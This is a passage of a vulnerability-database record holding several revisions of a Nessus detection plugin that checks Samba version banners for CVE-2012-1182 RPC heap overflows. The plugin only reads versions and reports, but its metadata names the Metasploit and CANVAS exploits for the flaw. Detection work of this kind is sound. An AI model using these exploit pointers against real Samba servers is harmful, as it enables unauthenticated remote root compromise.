script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "type": "nessus", "viewCount": 6}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-07-30T13:41:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2012-1182"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or otherwise determine if one of the associated patches has been applied.", "edition": 2, "enchantments": {}, "hash": "9029b9bcbe45945915f71a7cd22bcd1a4c114c7bbba7b4e60c8369fa4eafe1e3", "hashmap": [{"hash": "05eadc1d06d957176715d848b4e3f7f7", "key": "published"}, {"hash": "f988dc6e0b4d047c838adcca890ea132", "key": "naslFamily"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "30198047c9da0c07c57bf18f3c737e34", "key": "references"}, {"hash": "cee008b1844304a5d75ee8e30c3cd391", "key": "sourceData"}, {"hash": "470fe954b680cf02b4ca3137595cc603", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8bc38ebaf3bd93e6fed4f49988ea97f1", "key": "title"}, {"hash": "1ac4c362d435a40acf97fe0a9efae1f3", "key": "modified"}, {"hash": "66248eddd43d682ec5d179e78435c03c", "key": "description"}, {"hash": "0395c233485fa30e0688fdf763864504", "key": "href"}, {"hash": "c402e9ff9af6dcede82ea5d809541d8e", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=58662", "id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "lastseen": "2016-12-15T10:11:28", "modified": "2016-12-14T00:00:00", "naslFamily": "Misc.", "objectVersion": "1.2", "pluginID": "58662", "published": "2012-04-11T00:00:00", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-12-064/", "http://www.zerodayinitiative.com/advisories/ZDI-12-062/", "http://www.zerodayinitiative.com/advisories/ZDI-12-069/", "http://www.samba.org/samba/history/samba-3.6.4.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-071/", "http://www.zerodayinitiative.com/advisories/ZDI-12-061/", "http://www.zerodayinitiative.com/advisories/ZDI-12-068/", "http://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "http://www.samba.org/samba/history/samba-3.5.14.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-072/", "http://www.samba.org/samba/history/security.html", "http://www.samba.org/samba/history/samba-3.4.16.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-063/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/12/14 20:22:11 $\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_osvdb_id(81303);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "type": "nessus", "viewCount": 6}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2016-12-15T10:11:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:samba:samba"], "cvelist": ["CVE-2012-1182"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or otherwise determine if one of the associated patches has been applied.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-02-21T01:16:30", "references": [{"idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"], "type": "nmap"}, {"idList": ["CESA-2013:0515", "CESA-2012:0466", "CESA-2012:0465", "CESA-2013:0506"], "type": "centos"}, {"idList": ["OPENVAS:1361412562310840980", "OPENVAS:1361412562310870928", "OPENVAS:1361412562310123695", "OPENVAS:864213", "OPENVAS:1361412562310870581", "OPENVAS:881680", "OPENVAS:1361412562310864238", "OPENVAS:840980", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310881194"], "type": "openvas"}, {"idList": ["DEBIAN:BSA-070:68853"], "type": "debian"}, {"idList": ["SOL13719", "F5:K13719"], "type": "f5"}, {"idList": ["SAMBA:CVE-2012-1182"], "type": "samba"}, {"idList": ["ELSA-2012-0478", "ELSA-2013-0506", "ELSA-2012-0465"], "type": "oraclelinux"}, {"idList": ["CVE_2012_1182"], "type": "canvas"}, {"idList": ["SECURITYVULNS:VULN:12426", "SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:12328"], "type": "securityvulns"}, {"idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"], "type": "freebsd"}, {"idList": ["SUSE-SU-2012:0500-1", "SUSE-SU-2012:0501-2", "SUSE-SU-2012:0504-1"], "type": "suse"}, {"idList": ["EDB-ID:21850"], "type": "exploitdb"}, {"idList": ["ZDI-12-072", "ZDI-12-071", "ZDI-12-063", "ZDI-12-061", "ZDI-12-062", "ZDI-12-070", "ZDI-12-069", "ZDI-12-064"], "type": "zdi"}, {"idList": ["SSV:60050"], "type": "seebug"}, {"idList": ["ORACLELINUX_ELSA-2013-0515.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0465.NASL", "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "OPENSUSE-2012-224.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "REDHAT-RHSA-2013-0506.NASL", "FEDORA_2012-5843.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL"], "type": "nessus"}, {"idList": ["CVE-2012-1182"], "type": "cve"}, {"idList": ["RHSA-2012:0466", "RHSA-2012:0465", "RHSA-2013:0515"], "type": "redhat"}]}, "score": {"modified": "2019-02-21T01:16:30", "value": 9.6, "vector": "NONE"}}, "hash": "a67708af74cd22996a9a1643cd8515f0eabd9bf509cb103c45a16de17ff6ee95", "hashmap": [{"hash": "82eaa057c710e8f441190b3383e9ae3a", "key": "cpe"}, {"hash": "05eadc1d06d957176715d848b4e3f7f7", "key": "published"}, {"hash": "f988dc6e0b4d047c838adcca890ea132", "key": "naslFamily"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "9c2f905a32e078eb0883870780f7c314", "key": "references"}, {"hash": "421e24a53386c440ab62d84e440cbecc", "key": "sourceData"}, {"hash": "470fe954b680cf02b4ca3137595cc603", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8bc38ebaf3bd93e6fed4f49988ea97f1", "key": "title"}, {"hash": "66248eddd43d682ec5d179e78435c03c", "key": "description"}, {"hash": "0395c233485fa30e0688fdf763864504", "key": "href"}, {"hash": "c402e9ff9af6dcede82ea5d809541d8e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=58662", "id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "lastseen": "2019-02-21T01:16:30", "modified": "2018-11-15T00:00:00", "naslFamily": "Misc.", "objectVersion": "1.3", "pluginID": "58662", "published": "2012-04-11T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "https://www.samba.org/samba/history/security.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "https://www.samba.org/samba/history/samba-3.6.4.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "https://www.samba.org/samba/history/samba-3.4.16.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/history/samba-3.5.14.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "https://www.zerodayinitiative.com/advisories/ZDI-12-061/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "type": "nessus", "viewCount": 7}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 9, "lastseen": "2019-02-21T01:16:30"}], "edition": 16, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "82eaa057c710e8f441190b3383e9ae3a"}, {"key": "cvelist", "hash": "c402e9ff9af6dcede82ea5d809541d8e"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "4391399f27f142b79b2b7262b6666d67"}, {"key": "href", "hash": "e7babc75e3803ae6c6947a5a8ba9ce96"}, {"key": "modified", "hash": "0658bb008399a687b703257886c78457"}, {"key": "naslFamily", "hash": "f988dc6e0b4d047c838adcca890ea132"}, {"key": "pluginID", "hash": "470fe954b680cf02b4ca3137595cc603"}, {"key": "published", "hash": "05eadc1d06d957176715d848b4e3f7f7"}, {"key": "references", "hash": "9c2f905a32e078eb0883870780f7c314"}, {"key": "reporter", "hash": "324ed8dd90f32656500027003742bd7b"}, {"key": "sourceData", "hash": "421e24a53386c440ab62d84e440cbecc"}, {"key": "title", "hash": "8bc38ebaf3bd93e6fed4f49988ea97f1"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "a4b593fd61d0224fa13f2be1664dd725bf62f6cb175a7fe2c806691cffb125b9", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1182"]}, {"type": "f5", "idList": ["F5:K13719", "SOL13719"]}, {"type": "nmap", "idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"]}, {"type": "seebug", "idList": ["SSV:60050"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0504-1", "SUSE-SU-2012:0500-1", "OPENSUSE-SU-2012:0508-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2"]}, {"type": "redhat", "idList": ["RHSA-2013:0515", "RHSA-2012:0466", "RHSA-2012:0465", "RHSA-2012:0478", "RHSA-2013:0506"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12426", "SECURITYVULNS:VULN:12328", "SECURITYVULNS:DOC:28165"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0478", "ELSA-2012-0465", "ELSA-2013-0515", "ELSA-2012-0466", "ELSA-2013-0506"]}, {"type": "zdi", "idList": ["ZDI-12-072", "ZDI-12-061", "ZDI-12-069", "ZDI-12-071", "ZDI-12-070", "ZDI-12-062", "ZDI-12-063", "ZDI-12-064"]}, {"type": "freebsd", "idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "canvas", "idList": ["CVE_2012_1182", 